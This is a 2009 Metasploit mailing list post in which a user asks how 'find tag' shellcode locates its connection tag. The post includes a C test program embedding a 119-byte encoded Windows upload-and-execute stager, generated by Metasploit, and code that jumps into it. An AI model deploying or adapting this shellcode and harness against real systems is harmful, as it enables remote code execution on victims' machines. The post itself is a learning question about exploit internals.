Metasploit mailing list archives
Understanding Find Tag shellcode
From: cr01nk zer0 <cr01nk () gmail com>
Date: Mon, 23 Nov 2009 02:02:00 -0500
Hi , Could anybody help me in understanding find tag class of shellcodes. How to find the 4 byte connection tag (I think that first 119 byte shellcode is implementing a connection tag) and how to implement it in a shellcode testing code =================================================================================================== #include <stdio.h> #include <string.h> /* * windows/upexec/find_tag - 119 bytes (stage 1) * http://www.metasploit.com * Encoder: x86/shikata_ga_nai * TAG=0BoU, EXITFUNC=thread, * PEXEC=c:\windows\system32\calc.exe */ unsigned char buf[] = "\x33\xc9\xb1\x18\xbf\xed\xc2\xfb\x72\xdb\xc3\xd9\x74\x24\xf4" "\x5d\x31\x7d\x0e\x03\x7d\x0e\x83\x28\xc6\x19\x87\x4e\xf4\x22" "\x0c\x25\xbc\xec\x46\x79\x4f\x86\x01\x65\xc4\x83\x3a\xe6\xfa" "\x1e\x91\x46\xf8\x66\xd7\x64\xcd\x39\x15\xfd\xde\x4d\x32\xf5" "\xab\x17\xf9\x8e\xe0\x92\x79\x1b\xb4\x91\x65\x90\x19\x83\xa9" "\xa5\x7c\xd0\xbd\x80\x5a\x80\x5b\x95\x29\xda\xf2\x71\x51\x45" "\xff\xc1\xfa\x76\x2a\x6c\x81\x49\xa1\x80\x13\x1b\xfc\x50\x76" "\xca\x57\x97\xa5\x5f\x6a\x57\x08\xcf\xc0\xe2\x51\xf0\x0d"; int main() { void (*c0de)(); printf("Stager Shellcode Test\"\n"); *(int*)&c0de = (unsigned)buf; c0de(); }
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Understanding Find Tag shellcode cr01nk zer0 (Nov 22)